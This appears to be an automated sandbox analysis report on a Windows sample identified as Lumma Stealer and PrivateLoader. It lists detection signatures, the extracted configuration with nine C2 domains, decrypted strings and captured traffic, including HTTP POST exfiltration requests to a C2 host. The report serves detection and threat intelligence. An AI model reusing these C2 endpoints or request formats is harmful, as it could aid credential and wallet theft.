Edit tour

Windows Analysis Report
BnJxmraqlk.exe

Overview

General Information

Sample name:BnJxmraqlk.exe
renamed because original name is a hash value
Original sample name:356bde316f31cfc2ed244a7cdd359617.exe
Analysis ID:1585281
MD5:356bde316f31cfc2ed244a7cdd359617
SHA1:8bbf194502f5d3a15ebb6ab28d37ec2fe47f22a4
SHA256:f37b1604055cfa1d70ea439f2b38cb72a2da74bf6bba76b2e080e16146a53a5e
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, PrivateLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PrivateLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • BnJxmraqlk.exe (PID: 612 cmdline: "C:\Users\user\Desktop\BnJxmraqlk.exe" MD5: 356BDE316F31CFC2ED244A7CDD359617)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
{
  "C2 url": [
    "framekgirus.shop",
    "spottercurvei.click",
    "nearycrepso.shop",
    "cloudewahsj.shop",
    "tirepublicerj.shop",
    "noisycuttej.shop",
    "wholersorie.shop",
    "rabidcowse.shop",
    "abruptyopsn.shop"
  ],
  "Build id": "hcQl0m--"
}
SourceRuleDescriptionAuthorStrings
BnJxmraqlk.exeJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
          00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
            00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
              Process Memory Space: BnJxmraqlk.exe PID: 612JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Process Memory Space: BnJxmraqlk.exe PID: 612JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.BnJxmraqlk.exe.1c0000.0.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.830202+010020283713Unknown Traffic192.168.2.649713104.102.49.254443TCP
                    2025-01-07T13:17:04.008393+010020283713Unknown Traffic192.168.2.649714104.21.48.1443TCP
                    2025-01-07T13:17:04.851469+010020283713Unknown Traffic192.168.2.649716104.21.48.1443TCP
                    2025-01-07T13:17:06.110725+010020283713Unknown Traffic192.168.2.649722104.21.48.1443TCP
                    2025-01-07T13:17:11.453443+010020283713Unknown Traffic192.168.2.649758104.21.48.1443TCP
                    2025-01-07T13:17:12.721069+010020283713Unknown Traffic192.168.2.649767104.21.48.1443TCP
                    2025-01-07T13:17:14.473566+010020283713Unknown Traffic192.168.2.649783104.21.48.1443TCP
                    2025-01-07T13:17:15.813918+010020283713Unknown Traffic192.168.2.649792104.21.48.1443TCP
                    2025-01-07T13:17:19.762590+010020283713Unknown Traffic192.168.2.649819104.21.48.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:04.333555+010020546531A Network Trojan was detected192.168.2.649714104.21.48.1443TCP
                    2025-01-07T13:17:05.326910+010020546531A Network Trojan was detected192.168.2.649716104.21.48.1443TCP
                    2025-01-07T13:17:20.231843+010020546531A Network Trojan was detected192.168.2.649819104.21.48.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:04.333555+010020498361A Network Trojan was detected192.168.2.649714104.21.48.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:05.326910+010020498121A Network Trojan was detected192.168.2.649716104.21.48.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.089336+010020585981Domain Observed Used for C2 Detected192.168.2.6525201.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.161242+010020586061Domain Observed Used for C2 Detected192.168.2.6593471.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.114724+010020586101Domain Observed Used for C2 Detected192.168.2.6560541.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.077301+010020586161Domain Observed Used for C2 Detected192.168.2.6505531.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.138060+010020586181Domain Observed Used for C2 Detected192.168.2.6546151.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.146376+010020586221Domain Observed Used for C2 Detected192.168.2.6647871.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.126175+010020586281Domain Observed Used for C2 Detected192.168.2.6641591.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:02.101884+010020586321Domain Observed Used for C2 Detected192.168.2.6494491.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:10.766967+010020480941Malware Command and Control Activity Detected192.168.2.649722104.21.48.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T13:17:03.368085+010028586661Domain Observed Used for C2 Detected192.168.2.649713104.102.49.254443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: spottercurvei.clickAvira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/~Avira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/apiAvira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/api:uAvira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/api298Avira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/Avira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/apilaAvira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/s&Avira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/s6Avira URL Cloud: Label: malware
                    Source: https://sputnik-1985.com/apilaVAvira URL Cloud: Label: malware
                    Source: 0.2.BnJxmraqlk.exe.1c0000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "spottercurvei.click", "nearycrepso.shop", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop"], "Build id": "hcQl0m--"}
                    Source: BnJxmraqlk.exeVirustotal: Detection: 33%Perma Link
                    Source: BnJxmraqlk.exeReversingLabs: Detection: 31%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: BnJxmraqlk.exeJoe Sandbox ML: detected
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: spottercurvei.click
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: hcQl0m--

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeUnpacked PE file: 0.2.BnJxmraqlk.exe.1c0000.0.unpack
                    Source: BnJxmraqlk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49767 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49783 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49792 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49819 version: TLS 1.2
                    Source: Binary string: E:\release-reflect-8\release\x86\working\reflect.pdb source: BnJxmraqlk.exe
                    Source: Binary string: wntdll.pdbUGP source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: BnJxmraqlk.exe, 00000000.00000002.2350564465.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp

                    Spreading

                    barindex
                    Source: Yara matchFile source: BnJxmraqlk.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeDirectory queried: number of queries: 1001

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.6:50553 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.6:64159 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.6:49449 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.6:54615 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.6:59347 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.6:64787 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.6:52520 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.6:56054 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49713 -> 104.102.49.254:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49722 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49819 -> 104.21.48.1:443
                    Source: Yara matchFile source: BnJxmraqlk.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Malware configuration extractorURLs: framekgirus.shop
                    Source: Malware configuration extractorURLs: spottercurvei.click
                    Source: Malware configuration extractorURLs: nearycrepso.shop
                    Source: Malware configuration extractorURLs: cloudewahsj.shop
                    Source: Malware configuration extractorURLs: tirepublicerj.shop
                    Source: Malware configuration extractorURLs: noisycuttej.shop
                    Source: Malware configuration extractorURLs: wholersorie.shop
                    Source: Malware configuration extractorURLs: rabidcowse.shop
                    Source: Malware configuration extractorURLs: abruptyopsn.shop
                    Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.102.49.254:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49722 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49767 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49783 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49792 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49758 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.48.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49819 -> 104.21.48.1:443
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WW7R38ADA900WJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OOG2NDWT1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=12HYARPH96User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19910Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z2XGBDWYJ5FRQREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 922Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5G3M9VPI83U93M4I1GMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586875Host: sputnik-1985.com
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: sputnik-1985.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: spottercurvei.click
                    Source: global trafficDNS traffic detected: DNS query: nearycrepso.shop
                    Source: global trafficDNS traffic detected: DNS query: abruptyopsn.shop
                    Source: global trafficDNS traffic detected: DNS query: wholersorie.shop
                    Source: global trafficDNS traffic detected: DNS query: framekgirus.shop
                    Source: global trafficDNS traffic detected: DNS query: tirepublicerj.shop
                    Source: global trafficDNS traffic detected: DNS query: noisycuttej.shop
                    Source: global trafficDNS traffic detected: DNS query: rabidcowse.shop
                    Source: global trafficDNS traffic detected: DNS query: cloudewahsj.shop
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                    Source: BnJxmraqlk.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                    Source: BnJxmraqlk.exeString found in binary or memory: http://ocsp.comodoca.com0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: BnJxmraqlk.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
